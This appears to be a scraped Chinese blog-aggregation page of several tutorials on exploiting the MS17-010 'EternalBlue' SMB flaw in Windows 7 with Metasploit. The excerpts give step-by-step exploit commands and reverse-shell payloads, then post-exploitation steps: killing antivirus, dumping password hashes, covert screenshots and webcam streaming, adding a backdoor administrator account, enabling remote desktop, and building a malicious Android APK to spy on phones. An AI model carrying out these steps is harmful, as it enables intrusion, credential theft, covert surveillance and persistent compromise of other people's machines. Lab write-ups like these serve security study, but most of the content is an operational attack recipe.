精华内容
下载资源
问答
  • 2、尝试使用永恒之蓝进行渗透 使用windows/x64/meterpreter/reverse_tcp PAYLOAD 设置好各项参数 成功进入meterperter工具 使用getpid获取Meterpreter Shell的进程号 继续使用ps查看本机运行的进程,选择一...

    一、通过nmap扫描得知目标机开放了445端口,运行的操作版本为WIN7
    在这里插入图片描述2、尝试使用永恒之蓝进行渗透
    在这里插入图片描述
    使用windows/x64/meterpreter/reverse_tcp PAYLOAD
    设置好各项参数
    成功进入meterperter工具
    使用getpid获取Meterpreter Shell的进程号
    在这里插入图片描述
    继续使用ps查看本机运行的进程,选择一个稳定的系统进程,将shell迁移过去
    在这里插入图片描述3、或者使用自动迁移命令 run post/windows/manage/migrate
    在这里插入图片描述
    4、获取目标机系统信息,查看是否运行在虚拟机上,查询运行时间,查看完整网络设置
    在这里插入图片描述
    5、关闭目标机器杀毒软件,开启远程桌面
    在这里插入图片描述6、添加一条路由,然后就可以借助被攻陷的主机对其他网络进行攻击了。列举当前有多少用户登陆了目标机,可以看到用户XinSai在登录中。
    在这里插入图片描述7、列举安装在目标机上的应用程序
    在这里插入图片描述8、抓取自动登录的用户名和密码
    在这里插入图片描述木有设置自动登录密码下去试试

    9、屏幕截图与录像直播
    1、load espia 插件,然后输入screengrab或者screenshot获取截图
    然后使用’eog+照片path’即可查看,eog,即linux的内置图片查看器 eye of gmone 的缩写。
    在这里插入图片描述
    webcam_list查看目标机摄像头列表
    webcam_snap打开摄像头并拍一张照片
    webcam_stream开启直播模式,使用file:///root/xxx.html查看直播

    shell进入目标机Shell下面,由于Linux和Windows编码不同会乱码,使用chcp 65001解决,exit结束会话。
    search -f *.txt -d c:\ #搜索c盘中所有以.txt为后缀的文件 -f 搜索模式 -d 指定目录。
    download c:\test.txt /root
    upload /root/test.txt c:\

    展开全文
  • 要求:win7虚拟机不要开防火墙,开放445端口,没有打永恒之蓝的补丁 实验开始: 先用nmap扫描一下靶机开了哪几个端口: nmap -Sv -p 1-1000 192.168.56.134 跑了两分钟,发现win7着实开了445端口。接下来直接打开...

    申明
    本文章仅供学习使用


    环境准备:
    win7虚拟机(靶机)
    ip:192.168.56.134

    kali虚拟机(攻击机)
    ip:172.18.20.164

    要求:win7虚拟机不要开防火墙,开放445端口,没有打永恒之蓝的补丁


    实验开始:
    先用nmap扫描一下靶机开了哪几个端口:

    nmap -Sv -p 1-1000 192.168.56.134
    

    在这里插入图片描述
    跑了两分钟,发现win7着实开了445端口。接下来直接打开msfconsole来进行攻击。
    打开msfconsole会随机跳出图案,每一次打开都不一样
    打开msfconsole会随机跳出图案,每一次打开都不一样。
    接下来使用exploit/windows/smb/ms17_010_eternalblue模块进行攻击即可。

    如果忘了模块名问题也不大,直接搜索漏洞名字ms17-010即可:

    search ms17-010
    

    在这里插入图片描述
    根据后面的等级(rank)来进行选择即可。这里使用exploit/windows/smb/ms17_010_eternalblue模块哈,命令如下:

    use exploit/windows/smb/ms17_010_eternalblue
    

    使用show options命令查看我们需要设置啥参数:
    在这里插入图片描述
    首先,Required参数为no的,设置或者不设置都行。但是参数为yes的必须设置。看了一下,只有RHOSTS(靶机ip)需要设置。
    我这边由于端口4444已经被占用了,于是设置为1234。
    设置参数:

    set rhosts 192.168.56.134
    set lport 1234
    这里命令对大小写不敏感,随意。
    

    在这里插入图片描述
    参数设置完毕,在攻击之前设置一下payload:
    set payload windows/x64/meterpreter/reverse_tcp
    可以用run命令或者exploit命令运行:
    在这里插入图片描述
    看到meterpreter >就意味着已经攻下啦!接下来就是提权并且进行后渗透信息收集,这里做一些简单的介绍。


    getuid 当前用户的名字,这里直接拿到了system权限
    在这里插入图片描述
    getsystem 不是system权限时,可以用这个命令拿到system权限(大多数情况下执行不通,需要利用漏洞进行提权,提权命令还是这个)
    run post/windows/gather/forensics/enum_drives 检查磁盘情况在这里插入图片描述
    其实我是没有D盘的,这里指的是我有个D的驱动器(我也不知道为啥有驱动器)
    run post/windows/gather/checkvm 检查是否为虚拟机在这里插入图片描述
    run post/windows/gather/enum_services 列出当前所有服务
    run post/windows/gather/enum_applications 列出应用,并且想将详细信息写在下面那个路径之下,可以cat一下查看:在这里插入图片描述
    在这里插入图片描述
    run post/windows/gather/dumplinks 列出最近的操作(我的虚拟机刚装,所以没啥操作,不然能列一大串)在这里插入图片描述
    run post/windows/gather/enum_patches 列出所有补丁在这里插入图片描述
    以上方法复杂,费时。利用run scraper命令,执行一个脚本,自动将所有你想收集的信息收集一遍,然后存储/root/.msf4/logs/scripts/scraper/下,具体命名为靶机ip+当前日期:在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    基本上你想要的信息都在这里了:
    cat hashes.txt这里存放着所有用户的密码的哈希值,存放格式为LM : NTLM格式,可以利用撞库进行破解。其他的文件有兴趣的自己查看哈~·在这里插入图片描述
    run post/windows/gather/hashdump 跟msf内置的库进行对比,对上了就呈现出来,对不上就呈现哈希值:在这里插入图片描述
    我的密码比较简单,直接就给我跑出来了,打个码哈~
    跑不出来的哈希值可以去www.cmd5.com去破解,简单的直接出来,难的需要付费,一毛钱。

    run killav关掉杀毒软件
    run post/windows/manage/killava 同上

    命令有很多,我整理的就辣么一点,喜欢的点赞关注收藏一波哈,希望能帮到你们~


    最后:互联网不是法外之地,大家且行且珍惜~

    展开全文
  • Eternal Blue(永恒之蓝)-ms17-010渗透测试 第一次做的渗透测试,也是第一次去写博客,还望各位师傅多多指正 :) 工具 1.靶机系统 window7 开放445以及139端口 2.kali-Linux虚拟机 注意保证靶机与主机IP位于同一...

    Eternal Blue(永恒之蓝)-ms17-010渗透测试

    第一次做的渗透测试,也是第一次去写博客,还望各位师傅多多指正 :)

    工具
    1.靶机系统 window7 开放445以及139端口
    2.kali-Linux虚拟机
    注意要保证靶机与主机IP位于同一网段(可用ping命令进行检测)

    0x01 更新metasploit

    在kali终端输入msfconsole启动metaspolit模块
    然后输入apt-get install metaspolit-framework(要在root权限下,若不在,记得在命令前加入sudo,记得输入密码)

    0x02查找漏洞

    输入search ms17-010,接着就可以看到五行可用命令
    应该是两行use auxiliary,三行use exploit命令

    0x03进行扫描

    执行命令:use auxiliary/scanner/smb/smb_ms17_010

    0x04选择排行等级较高的攻击模块

    执行命令:use exploit/windows/smb/ms17_010_eternalblue
    【show payloads(设置攻击载荷)选择默认的即可,
    一般为set payload generic/shell_reverse_tcp
    下一步 show options(查看模块所需配置参数)
    set rhosts (设置靶机IP)
    set lhosts (设置主机IP)
    set lport 4444(监听端口)

    0x05最后一步,渗透开始

    命令:exploit
    或者 run 也可以
    成功后,会出现meterpreter

    补充 445端口

    自己动手,丰衣足食

    展开全文
  • 使用MS17-010漏洞对win7进行渗透永恒之蓝),ms17-010漏洞存在于未打补丁的win7&winserver2008;
  • Metasploit框架是一个开源的渗透工具,它是由Ruby语言编写的模块化框架,具有良好的扩展性,通过它可以轻易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 它提供了...

    Metasploit简介

    • Metasploit框架是一个开源的渗透工具,它是由Ruby语言编写的模块化框架,具有良好的扩展性,通过它可以轻易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。
    • 它提供了多个基本的用户接口,包括终端、命令行、图形化等,一般我们使用较多的是终端MSF和图形化的Armitage
    • 它分为社区版和商业版
      apt-get update
      apt-get install metasploit-framework

    MSF框架是由多个模块组成的,具体的模块及功能如下:
    1、Auxilitaries(辅助模块)
    负责执行扫描、嗅探、指纹识别等功能,用来以辅助渗透测试。
    2、Exploit(漏洞利用模块)
    能利用系统、应用或服务的漏洞进行攻击行为,包括缓冲区溢出、web程序攻击以及配置错误等,该模块包含各种POC验证,用于破坏系统安全的攻击代码。
    3、Payload(攻击载荷模块)
    攻击载荷是我们期望目标被渗透之后完成实际功能的攻击代码,用于执行任意命令或特定代码,在MSF中可以自由的选择、传送或者植入。
    4、Post(后渗透模块)
    该模块用于在获取到目标系统的控制权限后,进行一系列的后渗透攻击动作,如获取敏感信息,实施跳板等攻击等。
    5、Encoders(编码工具模块)
    该模块在渗透中负责编码、免杀、防止被杀软、防火墙、IDS等安全软件检测出来。

    大致的攻击步骤

    扫描目标系统、寻找漏洞
    选择并配置一个漏洞利用模块
    选择并配置一个攻击载荷模块
    选择一个编码模块,用来绕过杀软查杀
    渗透攻击

    Metasploit基本使用

    情报收集相关模块
    敏感目录扫描
    auxiliary/scanner/http/brute_dirs
    auxiliary/scanner/http/dir_listing
    auxilisry/scanner/http://dir_scanner
    注意:他们使用暴力枚举的方式进行猜解,因此需要一个字典文件
    主机发现
    auxiliary/scanner/discovery/arp_sweep
    auxiliary/scanner/discovery/empty_udp
    auxiliary/scanner/discovery/ipv6_neighbor
    auxiliary/scanner/discovery/udp_sweep
    auxiliary/scanner/discovery/udp_probe
    用来探测主机存活,在设置rhost的时候可以使用192.168.1.1/24的方式探测网段主机。
    服务探测
    直接调用Nmap去进行扫描
    Nmap -sS -Pn 192.168.1.1 -sV
    -sS SYN半连接扫描
    -Pn 扫描前不探测
    -sV 服务详细版本
    单个服务批量探测
    端口扫描
    auxiliary/scanner/portscan/ack
    auxiliary/scanner/portscan/ftpbounce
    auxiliary/scanner/portscan/syn
    auxiliary/scanner/portscan/tcp
    auxiliary/scannerportscan/xmas
    用来扫描端口
    单个服务批量探测
    在这里插入图片描述
    在这里插入图片描述

    常见模块:
    在这里插入图片描述
    漏洞利用:
    exploit/windows/smb/ms17_010_eternalblue
    auxiliary/scanner/smb/smb/smb_ms17_010

    Metasploit相关术语

    渗透攻击(Exploit)
    渗透攻击是指由攻击者或渗透测试者利用一个系统,应用或服务中的安全漏洞,所进行的攻击行为。攻击者使用渗透攻击去入侵系统时,往往会造成开发者所没有预期的一种特殊结果。流行的渗透攻击技术包括缓冲区溢出、Web应用程序漏洞攻击(比如SQL注入),以及利用配置错误等。
    攻击载荷(Payload)
    攻击载荷是我们期望目标系统在被渗透攻击之后去执行的代码,在Metasploit框架中可以自由的选择、传送和植入。例如,反弹式shell是一种从目标主机到攻击主机创建网络连接,并提供命令shell的攻击载荷,而bind shell攻击载荷则在目标主机上将命令行shell绑定到一个打开的监听端口,攻击者可以连接这些端口来取得shell交互,攻击载荷也可能是简单的在目标操作系统上执行一些命令,如添加用户账号等。
    监听器(Listener)
    监听器是Metasploit中用来等待连入网路连接的组件,举例来说,在目标主机被渗透攻击后,它可能会通过互联网回连到攻击主机上,而监听器组件在攻击主机上等待被渗透攻击的系统来连接,并负责处理这些网络连接。
    Schellcode
    Schellcode是在渗透攻击时作为攻击载荷运行的一组机器指令。Shellcode通常用汇编语言编写,在大多数情况下,目标系统执行了Shellcode这一组指令之后,才会提供一个命令行shell或者Meterpreter shell,这也是Shellcode名称的由来
    模块(Module)
    模块是指Metaspoit框架中所使用的一段软件代码组件,在某些时候,你可能会使用一个渗透攻击模块(exploit module),也就是用于实际发起渗透攻击的软件组件,而在其他时候,则可能使用一个辅助模块(auxiliary module),用来执行一些诸如扫描或系统查点的攻击动作。这些在不断变化和发展中的模块才是使Metasploit框架如此强大的核心所在。
    常用命令
    search 查找关键字
    use 模块名 使用模块
    show options 查看参数选项
    set 选项 参数 设置参数
    show payloads 显示所有payload
    session -i 列出会话列表
    back 返回上一层
    session -i 会话id 选择会话
    session -k 会话id 杀掉会话
    show targets 显示目标os版本
    set target 目标序号 选择目标系统
    show auxiliary 显示辅助模块
    ctrl+z 把会话放在后台
    ctrl+c 终止会话

    永恒之蓝漏洞简介

    永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
    Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任意操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖掘机等恶意程序。
    漏洞编号:ms17-010
    影响范围:目前已经受影响的Windows版本包括但不限于:Windows NT,Windows2000、Windows XP、Windows2001、WindowsVista、Windows 7、Windows 8、Windows 2008、WidowsR2、Windows Server 2012 SPO
    虚拟机需要安装一个Windows 7 x64 的克隆的虚拟机
    注意:如果虚拟机不能使用,修改里面后缀为vmx的文件,将virtualHW.version="18"改为virtualHW.version=“15”
    永恒之蓝漏洞复现
    漏洞描述:
    Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
    影响版本:
    目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
    复现环境:
    攻击机:kali 64位 (IP:192.168.149.130)
    靶机:Windows 7 x64 的克隆(IP:192.168.149.140)
    复现过程:

    1. 测试两台主机的连通性:用kali 去Ping windows 7的主机,来测试连通性:ping 192.168.149.140
      (登录kali linux,用nmap探测靶机 nmap -r 192.168.149.140
      探测到靶机,并探测到开放445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞。)
    2. 查看kali 主机数据库是否开启:service postgresql status
    3. 如果关闭则打开kali 主机的数据库: service postgresql start
    4. 进行msfdb 数据库初始化,配置数据库相关信息:msfdb init
    5. 执行命令:msfconsole
    6. 搜索ms17-010代码:search ms17_010
    7. 使用ms17-010扫描模块,对靶机进行扫描
      使用模块
      扫描命令:use auxiliary/scanner/smb/smb_ms17_010
      攻击命令:use exploit/windows/smb/ms17_010_eternalblue
    8. 然后显示所需要的参数 show options
      会发现RHOSTS和THREADS,RHOSTS是要扫描的主机(主机段),THREADS是线程,默认是1,开始使用线程加快扫描
    9. 设置靶机ip地址 set rhost 192.168.149.140
    10. 设置攻击载体 set payload windows/x64/meterpreter/reverse_tcp
    11. 设置监听ip地址 set lhost 192.168.149.130
      执行扫描
      run
      执行攻击
      exploit
      可以看到监听IP及端口(WIN)
    12. 持续攻击(种植后门)
      1.显示远程主机系统信息:sysinfo
      2.查看用户身份:getuid
      3.对远程主机当前屏幕进行截图:screenshot
      打开截图所在位置:
      4.获得shell控制台:shell
      上面显示转到C:\Windows\system32目录下,说明已经获得了shell的控制权
      5.进行后门植入(创建新的管理员账户)
      net user hack 123456 /add
      net localgroup administrators hack /add
      net user //查看windows 7本地用户
      net localgroup administrators //查看windows 7本地管理员
      6.开启远程桌面功能
      REGADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /vfDenyTSConnections /t REG_DWORD /d 0 /f
      7.kali 远程桌面连接Win7
      root下: rdesktop192.168.149.140:3389

    渗透安卓手机

    1.生成apk程序
    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 R > apk.apk
    2.启动msfconsole
    3.启动use exploit/multi/handler模块
    4.set payload android/meterpreter/reverse_tcp
    5.show options
    6.set lhost 本机IP
    set LPORT 5555
    exploit(运行apk程序)
    7.查看手机信息sysinfo
    8.查看摄像头
    meterpreter > webcam_list

    • Back Camera
    • Front Camera

    9.启动摄像头拍照
    webcam_snap -i 1
    webcam_snap -i 2

    展开全文
  • 利用msf渗透测试永恒之蓝漏洞详细教程 1、打开kali,利用msf(系统默认已经安装)渗透框架进行攻击测试 2、查找永恒之蓝对应的模块 3、利用辅助模块(auxiliary)进行探测信息(在第二步已经查找出来所有与之相关...
  • 永恒之蓝漏洞渗透测试
  • 文章目录一、使用环境二、渗透之前三、渗透测试Ⅰ、配置msfconsoleⅡ、设置载荷Ⅲ、开始渗透常用meterpreter命令Ⅳ、用户提权Ⅴ、远程连接完 免责声明:本文章仅供学习、交流使用 一、使用环境 VMware V15.5.0 ...
  • 针对永恒之蓝漏洞,自动导入IP安全策略的脚本屏蔽135-139、445、3389端口,对脚本进行优化,解决了以管理员权限运行脚本时,默认路径是"C:\Windows\system32>" 导致命令找不到策略文件,导入策略失败的问题。...
  • 在扫描出有着永恒之蓝漏洞的计算机,我们已经得到对方的ip,直接使用msf的永恒之蓝攻击模板对其进行渗透。 现在我们就已经成功的入侵到了win7计算机当中了,通过永恒之蓝漏洞,简简单单远程就能控制局域网内的...
  • msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
  • 永恒之蓝是影子经纪人黑客组织攻破美国NSA黑客组织公布的漏洞工具之一。 2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows...
  • 提示:本文章内所有内容环境为自己搭建绝无违法内容,请不要利用其中的技术来做违法的事情。 声明:法律问题与本作者无关,请...实施利用 Kali Linux 对 Windows7 SP1 进行永恒之蓝操作,所以操作将在虚拟机上完成。...
  • 使用ms17-010对win7进行渗透(传说中的永恒之蓝

    万次阅读 多人点赞 2018-09-21 23:16:37
    程序就会运行,当看到WIN的时候,说明我们已经渗透进win7里面去了,按下回车出现了win7的cmd,这是已经是渗透成功了。但有时候不一定会成功,会返回FAIL,说明这个系统打了补丁,这个漏洞已经没有威力了。 之后就...
  • 2. 可以看到,被攻击机的 445 端口是开放的,由此可以判断可以基于MS17_010进行"永恒之蓝攻击" 3. 输入"msfconsole"进入 Metasploit 命令行操作 4. 输入 “search ms17_010” 搜索与该漏洞相关的代码库 (注:...
  • 最近在学习web渗透。使用msf进行渗透测试,这个框架在kali里面是自带的,如果是想在Windows里面则需要自己安装框架。...从图片中也可以看出ms17-010可以利用,而这个漏洞也是永恒之蓝的漏洞。我们搜索一
  • 声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经...渗透目标及工具: 目标 找到3个flag 工具 菜刀 QuarksPwDump.exe kali 线索 公网IP...
  • 永恒之蓝漏洞演示

    2018-12-22 06:10:35
    利用kali linux在windows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂
  • Linux kali虚拟机利用msf框架对win7的永恒之蓝渗透 术语 渗透攻击(exploit),指由攻击者或渗透测试者利用一个系统、应用或服务中的安全 漏洞,所进行的攻击行为。 攻击载荷(payload),是我们期望目标系统在...
  • kali+msf永恒之蓝渗透win7并建立新用户获取权限 1. 准备一台关闭防火墙的win7,目标ip地址为192.168.128.147,本机ip为192.168.128.146 2. 保证msf执行run的时候win7是开启的 msfconsle #启动msf search name:ms17-...
  • 上开放的端口有,其中445端口即为永恒之蓝漏洞所在端口,这也就是我们即将要攻击的端口。 PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp ...
  • kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National ...
  • 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192.168.1.108 ①启动msf,搜索ms17_010,使用msf中的auxiliary模块进行扫描 msf6 >... # Name Disclosure Date Rank...
  • kali与永恒之蓝

    千次阅读 2021-10-24 12:45:06
    kali永恒之蓝攻击写在前面一、永恒之蓝是何方神圣?二、神马是SMB协议?三、MSF四、攻击步骤1、攻击主机与靶机配置2、攻击步骤五、种植后门 写在前面   这是我的第一篇CSDN博客,最近又参加了一个CTF比赛,当然,...
  • 永恒之蓝是利用Windows操作系统445端口存在的漏洞进行传播,并具有自我复制、主动传播的特性。 基于Windows网络共享协议进行攻击传播的蠕虫恶意代码 一、测试准备: 目标机:server 2003 攻击机:kali 利用Nmap...
  • 利用ms17_010_eternalblue模块进行渗透: 打开msf框架: msfconsole 使用ms17_010_eternalblue模块及各个配置: use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter...
  • 利用虚拟机复现漏洞 “永恒之蓝

    千次阅读 多人点赞 2021-05-09 09:54:40
    利用虚拟机复现漏洞“永恒之蓝” 攻击:kali Linux 2020.3 靶机:Windows Server 2008 R2 x64 下面详细讲述测试的过程。 —— —— “ 永恒之蓝 ”简介 利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。于 2017 ...
  • 后渗透分析 查看权限及当前进程的pid 去靶机中使用命令 tasklist 查看该进程 切换到system32目录,使用net增加一个管理员账户 靶机可见,管理员添加成功,可惜没能找到相关日志 重启靶机,验证...
  • 永恒之蓝漏洞的利用原理是通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。 漏洞...
  • 永恒之蓝漏洞原理及利用

    万次阅读 多人点赞 2020-08-16 22:56:14
    甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,029
精华内容 411
关键字:

永恒之蓝后渗透